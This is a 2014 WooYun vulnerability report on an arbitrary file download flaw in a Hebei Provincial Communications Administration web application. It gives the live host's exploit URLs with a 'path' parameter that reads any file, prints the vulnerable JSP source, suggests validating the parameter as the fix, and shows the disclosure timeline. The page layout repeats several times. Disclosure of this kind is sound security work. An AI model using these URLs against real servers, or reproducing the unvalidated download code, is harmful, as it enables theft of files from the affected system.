河北省通信管理局任意文件下载漏洞 | wooyun-2014-073831| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073831

漏洞标题：河北省通信管理局任意文件下载漏洞

漏洞作者：路人甲

提交时间：2014-08-26 16:41

修复时间：2014-10-10 16:42

公开时间：2014-10-10 16:42

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-26：细节已通知厂商并且等待厂商处理中
2014-08-31：厂商已经确认，细节仅向厂商公开
2014-09-10：细节向核心白帽子及相关领域专家公开
2014-09-20：细节向普通白帽子公开
2014-09-30：细节向实习白帽子公开
2014-10-10：细节向公众公开

简要描述：

http://121.28.83.66:8080/zfba/stdownload.jsp?path=uploadFile/file5e8082408319.doc
看个文件，发现path变量没做任何审查就去读取文件了
http://121.28.83.66:8080/zfba/stdownload.jsp?path=stdownload.jsp

详细说明：

漏洞证明：

stdownload.jsp源码

<%@ page language="java" contentType="text/html; charset=GBK" pageEncoding="GBK"%>
<%@page import="com.jspsmart.upload.SmartUpload"%>
<%@ taglib prefix="c"  uri="http://java.sun.com/jsp/jstl/core"  %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
<title>Insert title here</title>
</head>
<body>
<% 
           response.setCharacterEncoding("GBK");
           String path = request.getParameter("path");
    		try{
        		// 新建一个SmartUpload对象
        		SmartUpload su = new SmartUpload();
        		// 初始化
        		su.initialize(pageContext);
        		// 设定contentDisposition为null以禁止浏览器自动打开文件，
        		//保证点击链接后是下载文件。若不设定，则下载的文件扩展名为
        		//doc时，浏览器将自动用word打开它。扩展名为pdf时，
        		//浏览器将用acrobat打开。
        		// 下载文件
        		su.setContentDisposition(null);
        		su.downloadFile(path);
        		out.clear();
        		out = pageContext.pushBody();
        	}catch(Exception e){
        		e.printStackTrace();
//        		out.println("<br></br><center>提示：<font color='red'>没有此 "+path+" 文件。</font></center>");
        	}
   %>
</body>
</html>

修复方案：

审查PATH变量，或者通过文件资源映射的方式

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-08-31 09:42

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073831

漏洞标题：河北省通信管理局任意文件下载漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2014-08-26 16:41

修复时间：2014-10-10 16:42

公开时间：2014-10-10 16:42

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073831

漏洞标题：河北省通信管理局任意文件下载漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2014-08-26 16:41

修复时间：2014-10-10 16:42

公开时间：2014-10-10 16:42

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-073831"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云